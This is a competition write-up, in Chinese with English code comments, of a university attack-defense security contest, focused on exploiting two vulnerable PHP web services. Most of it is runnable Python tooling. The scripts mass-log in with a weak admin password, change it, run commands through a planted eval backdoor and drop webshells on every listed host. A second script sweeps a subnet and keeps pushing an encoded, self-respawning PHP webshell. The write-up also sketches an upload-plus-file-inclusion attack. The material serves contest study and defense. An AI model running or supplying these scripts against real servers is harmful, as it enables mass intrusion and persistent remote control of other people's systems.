关于参加2023年江西省大学生信息安全技术大赛决赛AWD个人思路
有本科和专科组，比赛有60多个组，一个组3个人，权限为普通用户，没有 sudo 权限
由于比赛结束了，那个系统就进不了了
# WEB1
连接服务器查看运行了什么服务 **ps -aux**，或者是通过端口查看 **netstat -antlp**，打包网站源码 **tar -zcvf web.tar.gz /var/www/html**，把源码下载到本地用D盾扫描一下
发现存在后门查看一下在/var/www/html/admin/vip.php文件
但是这个后门在后台，要先找到后台
这边是存在弱口令，爆破出 admin 用户密码为 q1w2e3r4t5
来到 /admin/vip.php，这边通过源码看出来 Cookie 的值为 username=admin;password=q1w2e3r4t5，传参就可以 RCE
这边的话我是进了后台修改了弱口令，防止别人也利用（比赛密码不要设置 112233.com 这样的弱口令）。可以看到这边 POST 请求传值执行了 phpinfo();，获取 flag 的话执行 system('curl xxx'); 就可以了。这边是可以写脚本批量化的，由于我的代码水平有限，写出了勉强够用的，如下:
import requests
# Local HTTP proxy (127.0.0.1:8080) that every request in this script is sent through.
proxies = {
    'http': 'http://127.0.0.1:8080'
}
# NOTE(review): this top-level loop builds `poc1` for each line of url.txt but
# never uses it, and the handle `f` is never closed; every function below
# re-opens url.txt and repeats the same loop itself.
f = open('url.txt', 'r', encoding='utf-8')
for i in f:
    i = i.strip()
    line = i
    poc1 = line +'/admin/login.php'
def login():
    """Stage 1: replay the fixed admin credentials against /admin/login.php on every host in url.txt.

    Each line of url.txt is treated as a base URL.  A form POST of
    ``id=1&username=admin&password=q1w2e3r4t5`` is sent through ``proxies``;
    an HTTP 200 is taken as a successful login and hands off to
    ``new_login_pass()``.  Only the status code is inspected, so any page that
    answers 200 counts as success.

    Defensive note: the weakness exercised here is the weak admin password
    described in the write-up; the same credential pair arriving at this path
    on many hosts from one source is what a defender would see.
    """
    f = open('url.txt', 'r', encoding='utf-8')  # NOTE(review): never closed
    for i in f:
        i = i.strip()
        line = i
        poc1 = line + '/admin/login.php'
        headres = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        data = 'id=1&username=admin&password=q1w2e3r4t5'
        #print(poc1)
        res = requests.post(url=poc1, proxies=proxies, data=data, headers=headres).status_code
        if res ==200:
            # new_login_pass() re-reads the whole of url.txt itself, so the
            # next stage runs against every host once per 200 seen here.
            new_login_pass()
        else:
            print('密码错误')  # "wrong password"
def new_login_pass():
    """Stage 2: POST to /admin/upadmin.php on every host in url.txt to change the admin password.

    The original credentials are supplied in the Cookie header and the form
    submits ``password=112233.com``; the later stages authenticate with that
    new value.  A 200 response hands off to ``get_shell()``; any other status
    is silently ignored.  Like ``login()``, this loops over all of url.txt
    itself rather than over the single host that triggered it.
    """
    f = open('url.txt', 'r', encoding='utf-8')  # NOTE(review): never closed
    for i in f:
        i = i.strip()
        line = i
        poc2 = line + '/admin/upadmin.php'
        headres = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            # credentials travel in the cookie, not in a session token
            'Cookie': 'username=admin; password=q1w2e3r4t5'
        }
        data ='id=1&username=admin&password=112233.com'
        res = requests.post(url=poc2,data=data,proxies=proxies,headers=headres).status_code
        if res ==200:
            get_shell()
        else:
            pass  # non-200 responses are dropped without any output
def get_shell():
    """Stage 3: send PHP source to the /admin/vip.php backdoor on every host and look for the flag.

    The request body (``system('cat /flag');``) is sent verbatim; per the
    write-up the backdoor evaluates the body as PHP once the Cookie
    credentials match.  If the word ``flag`` appears anywhere in the
    response the host is reported and ``web_shell()`` is called; otherwise
    nothing is logged.

    Defensive note: the fix given at the end of the write-up is to remove the
    eval in vip.php.  POST bodies containing PHP calls such as ``system(``
    aimed at this path are the traffic signature to alert on.
    """
    f = open('url.txt', 'r', encoding='utf-8')  # NOTE(review): never closed
    for i in f:
        i = i.strip()
        line = i
        poc3 = line + '/admin/vip.php'
        headres = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            # the password changed by new_login_pass()
            'Cookie': 'username=admin; password=112233.com;'
        }
        data = "system('cat /flag');"
        res =requests.post(url=poc3,data=data,proxies=proxies,headers=headres).text
        if "flag" in res:
            print("命令执行成功")  # "command executed"
            web_shell()
        else:
            pass  # hosts without a flag in the response are skipped silently
def web_shell():
    """Stage 4: use the vip.php backdoor to drop a one-line eval webshell as ``.1.php`` on every host.

    The body runs ``echo ... >.1.php`` through ``system()``; the backslash
    escapes in ``data`` are meant for the remote shell, not Python (Python
    keeps unknown escape sequences literally, with a warning on recent
    versions).  The response is read but never checked, and ``proxies`` is
    re-declared locally with the same value as the module-level dict.

    Defensive note: the dropped file is a dot-file in the web root; a
    post-incident sweep of the web root for hidden ``.php`` files is where
    this artefact would show up.
    """
    f = open('url.txt', 'r', encoding='utf-8')  # NOTE(review): never closed
    for i in f:
        i = i.strip()
        line = i
        poc3 = line + '/admin/vip.php'
        headres = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': 'username=admin; password=112233.com;'
        }
        data = "system('echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >.1.php');"
        proxies = {
            'http': 'http://127.0.0.1:8080'
        }
        res = requests.post(url=poc3, data=data, proxies=proxies, headers=headres).text
if __name__ == '__main__':
    # Entry point: stage 1 fans out into the later stages via nested calls.
    login()
配合写 webshell，用比赛前写好的脚本批量写不死马
import concurrent.futures
import time
import requests
import os
import threading
import re
# Local HTTP proxy dict; defined here but not passed to any request in this script.
proxy={'http':'http://127.0.0.1:8080'}
# def aa():
# res = requests.get(url='http://www.baidu.com',proxies=proxy)
# print(res.status_code)
# Request headers used by shel(): plain form encoding only.
hander = {
    'Content-Type': 'application/x-www-form-urlencoded'
}
def get_ip(ip,wangduan):
    """Ping one address in the local /24 and append it to ``ip_true`` if it answers.

    ``wangduan`` is this machine's IPv4 address; its last octet is replaced
    with ``ip`` to form the target.  The probe relies on Windows-style
    ``ping`` syntax (``-n 2`` = two echo requests) and on an uppercase
    ``TTL`` field in the output, and the address is interpolated straight
    into the shell command.
    """
    a = wangduan
    b = a.split('.') # split the address on dots
    del b[-1] # drop the last octet
    new_ip = '.'.join(b)+'.'+ip # candidate address inside the same /24
    return1 = os.popen(f'ping {new_ip} -n 2') # run ping; -n 2 sends two requests
    if 'TTL' in return1.read(): # a TTL field in the reply means the host answered
        with open('ip_true','a+') as f:
            print(new_ip)
            f.write(new_ip+"\n")
def ip(): # fast multi-threaded sweep of the local /24
    """Prompt for the local IPv4 address and ping every host .1–.254 of its /24 concurrently.

    One thread per address is started and never joined; the Event is set but
    nothing waits on it, so the function returns while pings may still be
    running.  Hits are written to ``ip_true`` by ``get_ip``.
    """
    duan = input('输入本机IP:')  # prompt: "enter this machine's IP"
    evnet = threading.Event()
    for i in range(1,255):
        threading.Thread(target=get_ip, args=(str(i),duan)).start()
    evnet.set()
def shel(i,path,payload):
    """Deliver ``payload`` to the backdoor at ``http://<i><path>`` and record the host in ``nodie_shell``.

    ``payload`` is the form body built in ``shell()``.  The "written" message
    is printed as soon as the POST returns, before the status code is looked
    at.  On a 200 the dropped file is requested once to start it; the
    original comment says that GET is expected to time out, and the
    resulting exception is what reaches the bare ``except`` below, which
    appends the host to ``nodie_shell`` unless it is already listed.  Any
    error from the POST itself is caught by the outer handler and printed.
    """
    try:
        url = 'http://' + i + path
        res = requests.post(url=url, data=payload, timeout=3,headers=hander)
        print(i + ' 成功写入不死马')  # "payload written" (printed before the status check)
        try:
            if 200 == res.status_code: # did the write request succeed?
                print(i + '++++++++++++++++++++++成功执行不死马')  # "payload executed"
                requests.get(url='http://' + i + '/You_is_Dsb.php',timeout=1) # starting the dropped file times out by design
        except:
            # NOTE(review): bare except also swallows unrelated errors, and
            # the handle returned by open() here is never closed.
            file = open('nodie_shell', 'r').read().split('\n')
            if i not in file: # only record hosts that are not already listed
                with open('nodie_shell', 'a+') as f:
                    f.write(i + "\n")
    except Exception as a:
        print(f'访问默认后门出错ip :{i}')  # "error reaching the default backdoor"
def shell():
    """Interactive driver: read the backdoor password and path, then keep pushing the payload to every host in ``ip_true``.

    ``cmd`` becomes the form field name the backdoor reads; the value is a
    PHP snippet that base64-decodes ``$data`` and writes it to
    ``You_is_Dsb.php``.  Per the original comments the decoded file deletes
    itself and keeps re-creating a ``debug_backtrace.php`` file.  ``ip_true``
    is read once (handle not closed) and the outer ``while True`` re-sends
    to every host roughly every 0.25 s until the process is killed; the
    Event is created and set but never waited on.

    Defensive note: a web-root file that reappears after deletion suggests a
    still-running PHP process rather than a one-off upload, so stopping the
    process, not just removing the file, is what clears it.  Repeated POSTs
    to one backdoor path from a single source are the traffic signature.
    """
    cmd = input('输入默认后门的密码 :')  # prompt: "password of the default backdoor"
    path = input('输入后门路径,例如 /einf/dine.php :')  # prompt: "backdoor path, e.g. /einf/dine.php"
    # Variant 1: request body does not need base64:
    #payload = {cmd : "$abc = 'You_is_Dsb.php';$data = 'PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CiAgICAkZmlsZSA9IGZvcGVuKCItZGVidWdfYmFja3RyYWNlLnBocCIsICJ3Iik7CiAgICAkdHh0ID0gIlBEOXdhSEFnQ2tCbGNuSnZjbDl5WlhCdmNuUnBibWNvTUNrN0NpUmhJRDBnSW40clpDZ3BJbDRpSVhzcmUzMGlPd29rWWlBOUlDUjdKR0Y5V3pjMU9Ea3dNVjA3Q21WMllXd29JbHh1SWk0aVhISWlMaVJpS1RzS1B6ND0iOwogICAgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCR0eHQpOwogICAgZndyaXRlKCRmaWxlLCAkY29udGVudCk7CiAgICBmY2xvc2UoJGZpbGUpOwoJCXVzbGVlcCgxMDAwKTsKCX0KPz4=';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
    # Writes You_is_Dsb.php; once started it deletes itself and keeps generating "-debug_backtrace.php"; password 758901
    # Variant 2: request body must be base64 encoded:
    # payload = {cmd : "$abc = 'You_is_Dsb.php';$data = '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';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
    # Writes You_is_Dsb.php; once started it deletes itself and keeps generating "-debug_backtrace.php"; password 758901
    payload = {cmd: "$abc = 'You_is_Dsb.php';$data = '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';$detxt = base64_decode($data);file_put_contents($abc, $detxt);echo 'successfully.';"}
    # Writes You_is_Dsb.php; once started it deletes itself and keeps generating ".debug_backtrace.php"; password U2Uid3i1d; requires the request header "DCTOKENED" with value "XYXNhMTI0Quuuu734y83grw=="
    file = open('ip_true', 'r').read().split('\n')  # NOTE(review): handle never closed
    while True:
        evnet = threading.Event()
        for i in file:
            time.sleep(0.25)
            if i != '': # skip blank lines
                threading.Thread(target=shel, args=(i,path,payload)).start()
        evnet.set()
if __name__ == '__main__':
    # Step 1 (commented out): discover live hosts into ip_true
    #ip()
    # Step 2: push the self-respawning shell to the hosts listed in ip_true
    shell()
代码已在比赛环境中调试过
实现了弱口令登录、修改弱口令、执行命令、上传 webshell，这边也可以上不死马
这边修复的话，把 eval 注释掉就可以。比赛环境还有 SSRF，但是技术有限，RCE 不了
# WEB2
一样的思路：查看运行了什么服务 **ps -aux**，或者是通过端口查看 **netstat -antlp**，打包网站源码 **tar -zcvf web.tar.gz /var/www/html**，把源码下载到本地用D盾扫描一下
这边是存在文件包含加文件上传，思路就是先上传 .md 文件，再利用文件包含 getshell
文件上传源代码
首先上传.md文件里面包含php代码包含执行
上传成功后文件名被重命名了一下：时间戳后 md5 加密。思路就是用 burp 并发，写个死循环运行查看时间戳，整理一下 md5 加密，再进行目录扫描获取文件名。比赛由于队伍较多，可以写个脚本批量并发同一时间上传这个包，再进行目录扫描获取文件名，获取到权限并且上传 webshell
个人思路 比赛中有更厉害的师傅比我简单高效
#PWN
不会